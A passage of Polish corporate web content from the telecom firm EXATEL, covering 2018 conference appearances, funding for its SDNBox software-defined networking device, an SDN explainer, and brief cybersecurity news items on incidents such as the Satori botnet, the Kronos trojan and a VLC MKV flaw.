Forum Ekonomiczne w Krynicy

Podczas tegorocznej edycji nasi eksperci wezmą udział w dyskusjach. Pierwsza dotyczy innowacyjności i jej wpływu na polską gospodarkę. Ten temat jest dla EXATEL szczególnie bliski w kontekście realizowanych przez nas projektów B+R takich jak SDNbox czy TAMA. Drugi temat jest związany z cyberbezpieczeństwem, czyli jedną z głównych specjalizacji naszej firmy.

#1 Innowacje

Już pierwszego dnia o godzinie 18:45 rozpocznie się sesja plenarna z udziałem prezesa zarządu EXATEL – Nikodema Bończa Tomaszewskiego. Temat panelu to „Jak skutecznie budować innowacyjną gospodarkę? Doświadczenia – inspiracje – strategie”. Dalszy rozwój polskiej gospodarki jest uzależniony od wzrostu jej innowacyjności i „wartości dodanej” tworzonej przez firmy. Polska gospodarka staje się coraz bardziej innowacyjna, jednak jest konieczne zaangażowanie państwa i spółek pozostających pod władztwem skarbu. Nasze firmy powinny wykazywać większe ambicje w kwestii innowacyjności i wychodzenia poza rynek wewnętrzny. Czy polska gospodarka może w krótkim czasie stać się jeszcze bardziej innowacyjna? Powinna czerpać inspiracje z innych krajów, czy skupić się na wypracowaniu własnego modelu? Jak wiele brakuje nam do światowych potęg, a może w niektórych branżach osiągnęliśmy już ten status? Na te pytania będą odpowiadali uczestnicy tj.:

  • Jerzy Kwieciński – minister Inwestycji i Rozwoju,
  • Nikodem Bończa Tomaszewski – prezes zarządu EXATEL,
  • Dominika Bettman – prezeska zarządu Siemens Sp. z o.o.
  • Piotr Ciski, prezes Sage Sp. z o.o.,
  • Tomasz Czechowicz – założyciel oraz CEO MCI Capital S.A.,
  • Wiktor Janicki, dyrektor generalny Roche Polska Sp. z o.o.,
  • Krzysztof Krawczyk – partner zarządzający CVC Capital Partners.

Moderatorem sesji plenarnej będzie Bogusław Chrabota – redaktor naczelny dziennika Rzeczpospolita. Gościem specjalnym dyskusji jest Hermann Simon – założycie Simon-Kucher & Partners.

Kiedy: 4 września 2018 roku, 18:45 – 20:00.

Gdzie: Pijalnia.

#2 – cyberbezpieczeństwo

Trzeciego dnia, podczas Forum Bezpieczeństwa, Marcin Malicki – wiceprezes zarządu EXATEL weźmie udział w dyskusji „Cyberbezpieczeństwo – edukacja i promowanie właściwych zachowań w firmach i instytucjach”. Kwestia zapewnienia bezpieczeństwa cybernetycznego staje się kluczową kwestią dla sprawnego działania firm i instytucji, których spora część aktywności odbywa się w cyberprzestrzeni. Konkurencyjność nowoczesnej gospodarki w dużej mierze opiera się na sprawnym, efektywnym działaniu w wirtualnej przestrzeni, dlatego tak ważna jest edukacja w tym zakresie. W jaki sposób poprawiać wiedzę pracowników i użytkowników w zakresie cyberbezpieczeństwa? Gdzie szukać dobrych rozwiązań i wzorców? Na te pytania odpowiedzi udzielą:

  • Felix Barrio – dyrektor ds. cyberbezpieczeństwa, prac badawczo–rozwojowych i zarządzania talentami w Hiszpańskim Narodowym Instytucie ds. Bezpieczeństwa Cybernetycznego,
  • Biljana Cerin – członek zarządu (ISC)2,
  • Andreas Haggman – ekspert ds. Cyberbezpieczeństwa w Royal Holloway University of London,
  • Aleksey Yankovskyy – prezydent ISACA Kyiv Chapter na Ukrainie,
  • Marcin Malicki – wiceprezes zarządu EXATEL,
  • Maciej Masłowski – poseł na Sejm RP.

Moderatorem dyskusji jest Krzysztof Liedel – dyrektor Centrum Badań nad Terroryzmem Collegium Civitas. Gościem specjalnym będzie Predrag Tasevski – założyciel IGF MK.

Kiedy: 6 września 2018 roku, 10:40 – 11:55.

Gdzie: Stary Dom Zdrojowy, I piętro.

 

Międzynarodowy Salon Przemysłu Obronnego w Kielcach (MSPO)

To jedne z największych na świecie targów przemysłu obronnego. MSPO to wizytówka polskiej branży i miejsce prezentacji nowości sektora obronnego z całego świata. W tym roku, już po raz drugi, znajdzie się również stoisko naszej firmy. Na nim będzie można porozmawiać z naszymi ekspertami z zakresu cyberbezpieczeństwa i telekomunikacji realizującym projekt dla biznesu, sektora publicznego czy innych operatorów. Pokażemy też niektóre z urządzeń, na których na co dzień pracujemy. Serdecznie zapraszamy!

Polski SDNBox czyli innowacyjność w praktyce

Wczoraj, w obecności przedstawicieli rządu, podpisana została umowa na finansowanie projektu SDNBox. W jego ramach powstanie pierwsze polskie programowalne urządzenie sieciowe. W ciągu 36 miesięcy ma powstać w pełni funkcjonalne, przetestowane w praktyce rozwiązanie zgodne z założeniami SDN (z ang. Software Defined Networking).

Tematem przewodnim konferencji „Polska na szybkiej ścieżce do innowacji” była polska innowacyjność i jej wpływ na gospodarkę naszego kraju. W spotkaniu wzięli udział: wicepremier i minister Nauki i Szkolnictwa Wyższego – Jarosław Gowin, minister Przedsiębiorczości i Technologii – Jadwiga Emilewicz, wiceminister Obrony Narodowej – Tomasz Zdzikot, wiceminister Nauki i Szkolnictwa Wyższego – Piotr Dardziński, zastępca dyrektora Narodowego Centrum Badań i Rozwoju – Izabela Żmudka oraz wiceprezes EXATEL – Rafał Magryś. Głównym punktem spotkania było uroczyste podpisanie umowy dotyczącej finansowanie projektu badawczo-rozwojowego SDNBox. W jej wyniku konsorcjum firm EXATEL SA i Enamor International sp. z o.o. otrzymało dofinansowanie w wysokości blisko 10 mln złotych.

Czym jest SDN

SDN (ang. Software Defined Network) to sieć komputerowa w której następuję podział typowego urządzenia sieciowego na warstwę sterownika (mózg) i elementu obsługującego bezpośrednio ruch sieciowy (serce), gdzie naturalnie mózg steruje pracą serca a wręcz może definiować dla niego nową (rozszerzoną) rolę poprzez oprogramowanie – sieć definiowalna programowa / programowalna sieć. To odejście od zamkniętych pudełek, które technicznie budują sieć zwaną Internetem. Zmianę tą można porównać do przejścia z telefonów stacjonarnych (służących tylko do dzwonienia) do mobilnych komputerów w postaci smartfonów wykorzystujące aplikacje funkcjonujące w sieci Internet.

SDN w praktyce, czyli polski SDNBox

Rewolucja SDN to wprowadzenie idei smart na poziom infrastruktury, nowe spojrzenie na cyberprzestrzeń. Dziś każda nowa funkcja w sieci to właściwie instalacja nowego urządzenia. Ale czy tak musi być? Już nie, dziś technologia pozwala na więcej. Spójrzmy sobie na smartfon – w ramach ustandaryzowanych podzespołów wgrywając tylko odpowiednie oprogramowanie możemy mieć przy sobie mobilne biuro, miarkę, kompas, nawigację, latarkę, przenośne kino, mapę gwiazd czy przyrząd do ćwiczeń. To samo chcemy przenieść do świata telekomunikacji. W zależności od mechanizmów sterownika czy wgranego oprogramowania, urządzenie wykorzystywane w sieci będzie mogło pełnić diametralnie różne funkcje – router, przełącznik, serwer, element ochrony przed cyberzagrożeniami. Takiej elastyczności potrzebuje biznes, ale także telekomunikacja, wojsko czy polski przemysł.

Co przyniesie SDNBox

Oczywistą zaletą tego projektu jest stworzenie w Polsce innowacyjnego produktu. Takiego, który będzie mógł konkurować z innymi tego typu rozwiązaniami. A jest o co. Wartość rynku SDN w 2020 roku szacowana jest na 12,5 mld USD. Ale to nie wszystko. Projekt SDNBox to jeszcze:

  • gotowy produkt po 36 miesiącach pracy. W tym czasie urządzenie zostanie przetestowane w praktyce. Naszym celem jest przygotowanie SDNBox do możliwie najszybszego wdrożenia tego rozwiązania w naszej sieci. Później do uruchomienia produkcji i komercyjnej jego dystrybucji. Innymi słowy – projekt realizowany jest z myślą o jego możliwie najszybszym wykorzystaniu w praktyce.
  • lepszą ofertę dla klientów – rozwiązania będą dostarczane szybciej, a sama usługa będzie mogła być modyfikowana „w locie”. To elastyczność, której dzisiejszy rynek oczekuje od wszystkich – także od firm telekomunikacyjnych.
  • rozwój polskiej gospodarki. SDNBox można spokojnie wyprodukować i rozwijać w naszym kraju. To w tej części wspierać nas będzie partner projektu Enamor International sp. z o.o. A później do rozwoju platformy będą mogły przystąpić inne firmy, tworząc swoje autorskie rozwiązania.
  • cybersuwerenność w praktyce – sieci kluczowe dla funkcjonowania i bezpieczeństwa państwa (takich jak infrastruktura krytyczna, sieci rządowe itp.) będą działały na urządzeniach wytwarzanych w oparciu o rodzime rozwiązania. To oznacza lepszą kontrolę nad każdym jej elementem.
Podpisanie umowy na projekt SDNBox

Podpisanie umowy na projekt SDNBox – programowalne urządzenie sieciowe

Blisko 1,5 mld zł do końca roku czeka na przedsiębiorców we flagowym konkursie Narodowego Centrum Badań i Rozwoju – Szybka ścieżka. Podczas uroczystego podpisania umowy na finansowanie projektu SDNbox firmy EXATEL SA, beneficjenta NCBR, premier Jarosław Gowin oraz minister Jadwiga Emilewicz podkreślali, że najpopularniejszy obecnie program wsparcia dla firm przynosi konkretne efekty. Zaprezentowano najciekawsze projekty startupów i MŚP, które powstały dzięki finansowaniu z Szybkiej ścieżki.

Jeszcze w 2010 roku najliczniejszą grupę wśród polskich pracodawców stanowiły osoby w wieku 45–54 lata. Z najnowszych danych GUS wynika, że obraz polskiego przedsiębiorcy uległ znacznym zmianom. Dziś coraz więcej przedsiębiorców to osoby w wieku między 35–44 lata, doskonale wykształcone, stawiające na nowe branże. Młodzi Polacy chętniej zakładają własne firmy oraz realizują ambitne projekty, które przekładają się na konkurencyjność krajowej gospodarki.

Mamy w Polsce dobry klimat do rozwijania własnego biznesu przez młodych przedsiębiorców – mówi Jarosław Gowin, wicepremier i minister nauki i szkolnictwa wyższego. – Dzięki wsparciu takich instytucji jak Narodowe Centrum Badań i Rozwoju, pobudzamy kreatywność, kształtujemy postawę przedsiębiorczości, zachęcamy do prowadzenia prac badawczo-rozwojowych, ale przede wszystkim zapewniamy konkretne wsparcie finansowe, które pozwala na realizację innowacyjnych projektów. Polska jest dziś na szybkiej ścieżce do innowacji, obowiązkiem rządu jest tę drogę ułatwić.

Również Ministerstwo Przedsiębiorczości i Technologii przygotowało szereg zmian legislacyjnych, które mają uprościć – zwłaszcza małym i średnim przedsiębiorcom – prowadzenie firmy.

30 kwietnia weszła w życie Konstytucja Biznesu, która zmieniła polską rzeczywistość gospodarczą. Zmiany, które wprowadziła dotyczą takich obszarów jak m.in. relacje przedsiębiorcy z urzędami i załatwianie spraw urzędowych, zakładanie firmy, zawieszenie działalność. A to nie wszystkie zmiany ułatwiające prowadzenie biznesu w Polsce. Warto wspomnieć m.in. o pakiecie 100 Zmian dla Firm, sukcesji firm, czy Małym ZUS, który zacznie obowiązywać od 1 stycznia 2019 r. Trwają prace nad reformą zamówień publicznych. Przed nami finalizacja działań na rzecz przeciwdziałania zatorom płatniczym. Pracujemy też nad tzw. innovation box– przypomina Jadwiga Emilewicz, minister przedsiębiorczości i technologii.

Jednym z najpopularniejszych programów wsparcia dla przedsiębiorców jest dziś Szybka ścieżka organizowana przez Narodowe Centrum Badań i Rozwoju – agencję wykonawczą Ministerstwa Nauki i Szkolnictwa Wyższego. Budżet trzech konkursów zaplanowanych na drugie półrocze tego roku to aż 1,45 mld zł.

Nabór wniosków w konkursie dla mikro, małych i średnich przedsiębiorców już się rozpoczął i potrwa do 14 grudnia. W przypadku dużych firm i konsorcjów, których liderem jest duży przedsiębiorca wnioski będzie można składać od 3 września do 30 listopada. Założenia konkursów przewidują, że zarówno do MŚP, jak i dużych firm trafi po 700 mln zł. Do 28 grudnia NCBR czeka także na projekty zgłoszone do dofinansowania przez MŚP z certyfikatem Komisji Europejskiej „Seal of Excellence”, dla nich Centrum zarezerwowało kwotę 50 mln zł.

Szybka ścieżka to konkretne wsparcie i konkretne rezultaty, przyczyniające się do skoku cywilizacyjnego i technologicznego naszego kraju. Od początku roku zarówno duże jak i małe firmy zgłosiły do nas ponad 500 innowacyjnych projektów, wnioskując o łączne dofinansowanie rzędu blisko 4 mld zł. Widzimy więc, że chęć do innowacji w polskich przedsiębiorstwach jest naprawdę duża – podkreśla zastępca dyrektora NCBR Izabela Żmudka. – Dziś możemy obserwować ciężką pracę beneficjentów oraz efekty, jakie ona przynosi w postaci rozwijania czy wprowadzania zaawansowanych technologicznie produktów, które zdobywają nowe rynki. To również rozwiązania, które dzięki skutecznie przeprowadzonym pracom B+R mogą zrewolucjonizować obraz rzeczywistości – ekologiczne pozyskiwanie energii elektrycznej, immunoterapia nowotworów czy zaawansowane technologie kosmiczne to tylko przykłady z tysięcy projektów wspieranych przez NCBR.

O popularności programu Szybka ścieżka decyduje przejrzystość zasad oceny wniosków oraz ograniczenie formalności do minimum. Na odpowiedź o przyznaniu grantu przedsiębiorca czeka około 90 dni od zamknięcia naboru wniosków. Konkurs jest adresowany do wszystkich przedsiębiorców, niezależnie od tego jaką formę działalności prowadzą oraz tego jak długo działają na rynku. Wnioskowany projekt musi być realizowany w regionie słabiej rozwiniętym i wpisywać się w co najmniej jedną z 17 Krajowych Inteligentnych Specjalizacji.

W poniedziałek podpisana została kolejna umowa na wsparcie w ramach Szybkiej ścieżki dla dużych przedsiębiorstw i konsorcjów. Dofinansowanie w wysokości blisko 10 mln zł otrzymał projekt pn. „SDNbox – wielofunkcyjne rozwiązanie telekomunikacyjne definiowane programowo zgodnie z koncepcją SDN (Software Defined Networking)” realizowany w konsorcjum przez firmy EXATEL SA i  Enamor International Sp. z o.o.

Kończymy z filozofią zamkniętych pudełek. W zależności od wgranego do SDNBox oprogramowania, będzie ono mogło pełnić diametralnie różne funkcje – router, przełącznik, serwer, element ochrony przed cyberzagrożeniami. Takiej elastyczności potrzebuje biznes, ale także telekomunikacja, wojsko czy polski przemysł. SDNBox można spokojnie wyprodukować i rozwijać w naszym kraju. Co ważne – pierwsze tego typu urządzenia dopiero na świecie powstają. Jako gospodarka możemy więc konkurować o globalny rynek, którego wartość w 2020 roku szacowana jest na 12,5 mld dol. – mówi wiceprezes EXATEL Rafał Magryś.

Podczas wydarzenia swoje rozwiązania zaprezentowały także startupy i MŚP, które skorzystały już ze wsparcia Narodowego Centrum Badań i Rozwoju:

  • SKRIWARE Sp. z o.o. – warszawski startup dostarczający autorskie rozwiązanie edukacyjne oparte o technologię druku 3D.
  • SENSDX SA – firma działająca w zakresie telemedycyny, która opracowuje i rozwija technologię testów diagnostycznych dla ludzi i zwierząt, które precyzyjnie, w warunkach domowych, wykrywają rodzaje określonych patogenów.
  • VERSABOX Sp. z o.o. – firma tworzy autonomiczny system transportu, oparty na robotach mobilnych oraz uczących się algorytmach planowania i sterowania, który jest wykorzystywany w procesach produkcyjnych oraz nieliniowych procesach wewnętrznej logistyki magazynowej.

Program Szybka ścieżka jest finansowany ze środków Programu Operacyjnego Inteligentny Rozwój, poddziałanie 1.1.1. „Sektorowe programy B+R”.

Czas na Software-Defined Networking (SDN)

Rewolucja programowalnych sieci nadchodzi. Warto zacząć rozmowę o tej technologii i jej wdrożeniach. Na początek podstawowe fakty i cechy Software-Defined Networking (w skrócie SDN, programowalna sieć komputerowa).

SDN to nowa koncepcja budowy sieci telekomunikacyjnych. Utworzona w 2007 roku na Uniwersytecie Stanforda w USA i od tamtej pory rozwijana przez społeczność międzynarodową: uniwersytety i firmy telekomunikacyjne.

Szybka reakcja

Urządzenie sieciowe programowalnej sieci realizuje tylko działania wymagające szybkiej reakcji (sterowanie ruchem pakietów sieciowych). W filozofii SDN urządzenie jest zarządzalne: jego konfigurację można zmieniać w szerokim zakresie.

Centralne zarządzanie siecią

Zarządzanie siecią, od którego zależy ruch pakietów oraz kształt usług udostępnianych przez sieć jest przeniesione z urządzenia do węzła centralnego – sterownika sieci, który może zarządzać grupą urządzeń programowalnej sieci komputerowej.

Uniwersalne zastosowanie

Urządzenia SDN są bardziej uniwersalne,ponieważ do zmiany usług sieciowych, która w urządzeniach klasycznych wymagałaby rekonfiguracji lub wymiany urządzeń, w filozofii SDN wystarczy zarządzać węzłem centralnym, który wydaje urządzeniom polecenia zmiany konfiguracji. Ciągłe monitorowanie stanu urządzeń, które jest istotą sieci Software-Defined Networking, utrudnia atak na te urządzenia. Możliwość zmiany funkcji urządzenia i oferowanych przez nie usług sieciowych pozwala uniknąć wymiany urządzeń i jak najlepiej spożytkować ich zasoby.

Otwarty standard

Bardzo ważną rolę w rozwoju Software-Defined Networking odgrywają otwarte standardy, takie jak OpenFlow. Dzięki nim do zarządzania urządzeniami można używać otwartych projektów takich jak Open vSwitch czy ONOS.

Technologia rozwojowa

Filozofia SDN jest pokrewna do filozofii Internetu Rzeczy (IoT): wymiany usług na skraju sieci telekomunikacyjnej. Jest również przygotowana do przyjęcia technologii 5G.

Warunkiem sukcesu technologii Software-Defined Networking jest wdrożenie i popularyzacja elastycznych, szybkich i bezpiecznych urządzeń sieciowych, zgodnych ze standardem SDN. Utworzenie platformy tego typu urządzenia otwiera drogę do rozwoju innowacji w zakresie komunikacji sieciowej: mimo tylu lat rozwoju internetu, wciąż istnieją nierozwiązane problemy w zakresie zarządzania ruchem pakietów sieciowych i wciąż jest do rozwiązania wiele wyzwań aby usługi internetowe były dostarczane do konsumenta szybko, efektywnie i bezpiecznie.

Cyber blog

NameTests – quiz bramą do profili na Facebook

NameTests – quiz bramą do profili na Facebook

Jedna z aplikacji działających na portalu Facebook tj.  quiz NameTests w niewłaściwy sposób przetwarzała dane jego użytkowników. Program ten służył do prowadzenia popularnych w tym serwisie społecznościowym quizów. O skali problemu niech świadczy sam fakt, że do danych osobowych 120 mln użytkowników miał dostęp praktycznie każdy użytkownik interentu.

Znasz adres NameTests – widzisz dane

Okazuje się, że wystarczyło wpisać w przeglądarkę adres http://nametests.com/appconfig_user, aby dane takie jak imię, nazwisko, data urodzenia, zdjęcia osoby biorącej udział w quizach były wyświetlane na ekranie. Wyniki te zwracane są przez Java skrypt. To z kolei umożliwia pobieranie tych danych z innych web serwerów. 

Dostęp ten jest możliwy nawet 2 miesiące po usunięciu aplikacji. Powód – taki termin ważności tokena pobieranego razem z innymi danymi został określony przez autora. 

Na szczęście dla użytkowników NameTests opisana podatność została już usunięta.

Źródło: Medium.com

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Botnet Satori powraca w nowej odsłonie

Ostatnio zauważalny był znaczący wzrost skanowania na porcie 8000. Po wykonanej przez specjalistów z Qihoo 360 Netlab analizie okazało się, że przyczyną jest złośliwy kod. A jego źródło wiązane jest z botnetem Satori.

Czym jest Satori

Botnet ten wykorzystuje lukę związaną z przepełnianiem bufora opisaną w CVE-2018-10088 (data publikacji – 8 czerwca 2018 roku). Dotyczy ona XionMai uhttd 1.0.0. (pakiet serwera WWW najczęściej wykorzystywany w oprogramowaniu routerów i innych urządzeń IoT). Exploit może zostać wykorzystany przez atakującego do wysłania zniekształconego pakietu na porty 80 lub 8000 (od strony portu/interfejsu WAN routera). Zauważono również drugi exploit skierowany tylko na urządzenia firmy D-Link – DSL-2750B wykorzystując porty 80 i 8080.

Źródło: Security Affairs

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Kronos – przebudzenie… czyli o powrocie trojana

Badacze z Proofpoint opublikowali raport o reaktywacji trojana bankowego Kronos, odkrytego po raz pierwszy w 2014 roku. Pierwotnie malware służył przede wszystkim do kradzieży informacji o kontach bankowych z poziomu przeglądarki. Za autora uznaje się Marcusa Hutchinsa, który stworzonego przez siebie malware sprzedał na AlphaBay za 7000 dolarów.

Kronos reaktywacja

W kwietniu br pojawiły się pierwsze próbki nowego Kronosa. Istotną różnicą względem pierwotnej wersji jest modyfikacja komunikacji z C&C – “nowy” używa w tym celu TORa. W raporcie znalazły się opisy kampanii kierowanych do użytkowników z Niemiec, Japonii i Polski.

Pełna treść raportu dostępna jest na stronie Proofpoint.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Security through Distrusting czyli kiedy zaufanie jest złe – ESD18

Słowo “zaufanie” w cyberbezpieczeństwie jest mocno nadużywane. Odnosimy go do sprzętu, oprogramowania czy technologii. Chcemy, by każdy element był zaufany, czyli niewymagający naszej uwagi. Ale czy tak jest w rzeczywistości? Bo słowo zaufany oznacza, że dany komponent może skutecznie skompromitować cały nasz system. W końcu nie zawsze kontrolujemy każdy element, z którego składa się nasz system IT jak choćby sterowników chipsetu, portów USB czy BIOSu.

O tym jak zbyt duże zaufanie do technologii może stać się źródłem problemów w cyberbezpieczeństwi i jak sobie z tym radzić opowiada Joanna Rutkowska z Invisible Things Lab & Qubes OS Project. Było to drugie wystąpienie podczas ostatniej edycji EXATEL Security Days 2018.

Chcesz obejrzeć pozostałe wystąpienia? Możesz je zobaczyć na naszej stronie:

Wideo dostępne są także na naszym kanale YouTube.

O EXATEL Security Days 2018

Tegoroczna edycja to już trzecia konferencja poświęcona praktycznej stronie cyberbezpieczeństwa. Zasadą, której się trzymamy jest – jak najmniej teorii, jak najwięcej praktyki i działania. Ostatnie dwa lata przyniosły najszybsze w historii zmiany w sektorze cyberbezpieczeństwa. Po raz pierwszy pytania o wpływ systemów IT na codzienne życie, na stan i funkcjonowanie państwa zostały postawione w tak zdecydowany sposób.

Dyskusja o cyberbezpieczeństwie przeniosła się z konferencji, na pierwsze strony gazet. #CoDalej – takim hasłem postanowiliśmy promować tegoroczną edycję EXATEL Security Days. Jest bowiem jasne, że cyberbezpieczeństwo wkracza w nową erę. Erę, w której będzie dotyczyć wszystkich i to w zupełnie nowych kontekstach. Internet rzeczy, 5G, infrastruktura IT państwa, przemysł 4.0, konflikty hybrydowe – wielu tych zjawisk nie brano pod uwagę jeszcze rok, dwa lata temu. W co inwestować, żeby nie dać się wyprzedzić w tym „wyścigu zbrojeń”?

Cyber blog

Pierwsza kara RODO we Francji w kwocie 250 000 euro

CNIL (Commission nationale de l’informatique et des libertés), czyli francuski urząd odpowiedzialny za nadzór nad przestrzeganiem przepisów o ochrony danych osobowych (RODO), postanowił nie czekać zbyt długo z wydawaniem pierwszych kar za naruszenie przepisów RODO. Zgodnie z informacjami podanymi na oficjalnej stronie www.cnil.fr otrzymała ją firma Optical Partners. Kwota, na którą CNIL wycenił wartość naruszenia to 250 000 euro.

Organizacja ta już nie pierwszy raz miała problem z ochroną danych klientów. Mimo wcześniejszych ostrzeżeń oraz kar wciąż można było bez większych problemów uzyskać dostep do 334 000 dokumentów zawierających dane klientów. Stąd kara ta wydaje się być całkowicie uzasadniona.

Źródło: CNIL

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Matroska z niespodzianką, czyli atak przez format MKV

​Matroska z niespodzianką, czyli atak przez format MKV

Atakujący, aby dostarczyć ofierze szkodliwy kod, zwykle posługuje się plikami EXE, JS, PDF lub dokumentami pakietu MS Office z osadzonymi w ich wnętrzu makrami. W sprzyjających warunkach złośliwy może być jednak każdy plik, nawet zwykły plik tekstowy lub film zapisany w formacie Matroska.

Ostatni przypadek został niedawno opisany przez Eugene’a Ng. Odkrył on, że odpowiednio spreparowany plik MKV, otwarty w programie VLC, może doprowadzić do uruchomienia dowolnego kodu.

Matroska lubi brak aktualizacji

Problem dotyczy wszystkich wersji odtwarzacza, do wydania 2.2.8, włącznie. Sprawa jest o tyle poważna, że dostępny jest już odpowiedni moduł do Metasploita, co znacząco ułatwia pracę napastnikom.

Nasza rekomendacja? Taka jak zawsze – aktualizujcie oprogramowanie.

Źródło: Exploit Database

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Policzyć koszty cyberataku czyli analiza przypadków – ESD18

Analiza przypadków – ESD2018

Skuteczny cyberatak to ogromny cios dla instytucji. Wyciekają wrażliwe dane, blokowany jest proces produkcji… W efekcie organizacja traci nie tylko wizerunek. Traci realne pieniądze. I to liczone w milionach. Do takich strat ciężko się przyznać przed opinią publiczną, kontrahentami czy akcjonariuszami. Najlepiej więc o nich nie mówić…

Policzyć koszty cyberataku

Skąd wziąć informacje, jakie są koszty cyberataku? To trudne ale możliwie. Tego zadania podjął się Adam Haertle – doświadczony ekspert do spraw cyberbezpieczeństwa i założyciel serwisu Zaufana Trzecia Strona. Podczas 3 edycji EXATEL Security Days pokazał udokumentowane skutki finansowe największych incydentów bezpieczeństwa ostatnich lat i miesięcy. Przedstawił, jaki był ich wpływ na bilansy firm i na ich wycenę rynkową. Dla uczestników konferencji to była wyjątkowa okazja, aby zastanowić się, od czego zależy skala strat.

Dziś Ci, którzy nie byli na ESD18, mogą również poznać realne koszty cyberataku.

Wideo z ubiegłorocznego wystąpienia Adama Haertle, traktujące o wpływie cyberbezpieczeństwa na procesy polityczne – Jak zhakować wybory, jest dostępne na naszym kanale YouTube.

O EXATEL Security Days 2018

Tegoroczna edycja to już trzecia konferencja poświęcona praktycznej stronie cyberbezpieczeństwa. Zasadą, której się trzymamy jest – jak najmniej teorii, jak najwięcej praktyki i działania. Ostatnie dwa lata przyniosły najszybsze w historii zmiany w sektorze cyberbezpieczeństwa. Po raz pierwszy pytania o wpływ systemów IT na codzienne życie, na stan i funkcjonowanie państwa zostały postawione w tak zdecydowany sposób.

Dyskusja o cyberbezpieczeństwie przeniosła się z konferencji, na pierwsze strony gazet. #CoDalej – takim hasłem postanowiliśmy promować tegoroczną edycję EXATEL Security Days. Jest bowiem jasne, że cyberbezpieczeństwo wkracza w nową erę. Erę, w której będzie dotyczyć wszystkich i to w zupełnie nowych kontekstach. Internet rzeczy, 5G, infrastruktura IT państwa, przemysł 4.0, konflikty hybrydowe – wielu tych zjawisk nie brano pod uwagę jeszcze rok, dwa lata temu. W co inwestować, żeby nie dać się wyprzedzić w tym „wyścigu zbrojeń”?

Wesołe przygody pentesterów czyli RCE przed kawą – ESD18

Pentester to człowiek, który widział już wiele. Wejście do systemu poprzez zmianę jednej liczby w kodzie – proszę. Panel do logowania, który wymaga jedynie dowolnego hasła (bez znaczenia jakie słowo, byleby pole nie było puste) – znam. Webshell wbudowany w aplikację umożliwiający przejęcie całego serwera – to było miesiąc temu… 

Pentester w praktyce – czyli ciekawe znaleziska w codziennej pracy

Udane testy penetracyjne łatwo rozpoznać po radosnych okrzykach i wzajemnych gratulacjach. Podczas prezentacji pokazane zostały najciekawsze luki, które doprowadziły nasz zespół do przejęcia testowanej infrastruktury. O ciekawych momentach z życia pentesterów mówią: Marek Cybul, starszy inżynier ds. zaawansowanych usług bezpieczeństwa oraz Kamil Suska, również starszy inżynier ds. zaawansowanych usług bezpieczeństwa, departament cyberbezpieczeństwa, EXATEL.

Więcej interesujących materiałów można znaleźć na naszym kanale YouTube.

O konferencji

EXATEL Security Days 2018 to już trzecia edycja konferencji poświęconej praktycznej stronie cyberbezpieczeństwa. Zasadą, której się trzymamy jest – jak najmniej teorii, jak najwięcej praktyki i działania. Ostatnie dwa lata przyniosły najszybsze w historii zmiany w sektorze cyberbezpieczeństwa. Po raz pierwszy pytania o wpływ systemów IT na codzienne życie, na stan i funkcjonowanie państwa zostały postawione w tak zdecydowany sposób.

Dyskusja o cyberbezpieczeństwie przeniosła się z konferencji, na pierwsze strony gazet. #CoDalej – takim hasłem postanowiliśmy promować tegoroczną edycję EXATEL Security Days. Jest bowiem jasne, że cyberbezpieczeństwo wkracza w nową erę. Erę, w której będzie dotyczyć wszystkich i to w zupełnie nowych kontekstach. Internet rzeczy, 5G, infrastruktura IT państwa, przemysł 4.0, konflikty hybrydowe – wielu tych zjawisk nie brano pod uwagę jeszcze rok, dwa lata temu. W co inwestować, żeby nie dać się wyprzedzić w tym „wyścigu zbrojeń”?

Skuteczna ochrona urządzeń końcowych na cebulkę

Jak chronić endpoint-y wykorzystując proste zabezpieczenia – ESD18

Przejęcie endpoint-ów (stacji końcowych) jest głównym celem przestępców. Wymagają one tym samym kompleksowej ochrony. Jeden rodzaj zabezpieczeń na podstawie obserwacji SOC EXATEL przestaje być wystarczający. Co należy zrobić, by naprawdę utrudnić życie przestępcom? Poza oczywistymi rozwiązaniami, takimi jak inwestycja w profesjonalne rozwiązania, pozostaje jeszcze metoda “na cebulkę”. Ochrona za pomocą wielu warstw stosunkowo prostych zabezpieczeń. To bardzo efektywna kosztowo metoda ochrony endpoint-ów. Wymaga jednak czegoś więcej niż pieniędzy – wymaga wiedzy, pracowitości i doświadczenia. Na szczęście sporo wiedzy możemy dostać za darmo – na przykład w poniższym wideo. Zapraszamy!

Wideo pochodzi z wystąpienia Tomasza Wodzińskiego, kierownika Działu SOC Monitoring i SOC Reagowanie, Departament Cyberbezpieczeństwa EXATEL.

Więcej interesujących materiałów można znaleźć na naszym kanale YouTube.

O konferencji

EXATEL Security Days 2018 to już trzecia edycja konferencji poświęconej praktycznej stronie cyberbezpieczeństwa. Zasadą, której się trzymamy jest – jak najmniej teorii, jak najwięcej praktyki i działania. Ostatnie dwa lata przyniosły najszybsze w historii zmiany w sektorze cyberbezpieczeństwa. Po raz pierwszy pytania o wpływ systemów IT na codzienne życie, na stan i funkcjonowanie państwa zostały postawione w tak zdecydowany sposób.

Dyskusja o cyberbezpieczeństwie przeniosła się z konferencji, na pierwsze strony gazet. #CoDalej – takim hasłem postanowiliśmy promować tegoroczną edycję EXATEL Security Days. Jest bowiem jasne, że cyberbezpieczeństwo wkracza w nową erę. Erę, w której będzie dotyczyć wszystkich i to w zupełnie nowych kontekstach. Internet rzeczy, 5G, infrastruktura IT państwa, przemysł 4.0, konflikty hybrydowe – wielu tych zjawisk nie brano pod uwagę jeszcze rok, dwa lata temu. W co inwestować, żeby nie dać się wyprzedzić w tym „wyścigu zbrojeń”?

Cyber blog

Kolejny sukces w walce z handlem narkotykami w Darknet

Hiszpańska i austriacka Policja przy współpracy z Europolem rozbiła grupę przestępczą. Specjalizowała się w produkcji i dystrybucji narkotyków poprzez Darknet. Była ona zaangażowana także w pranie brudnych pieniędzy. Swoje zarobki legalizowali między innymi z pomocą kryptowalut, głównie Bitcoinów.

4,5 miliona w kryptowalucie

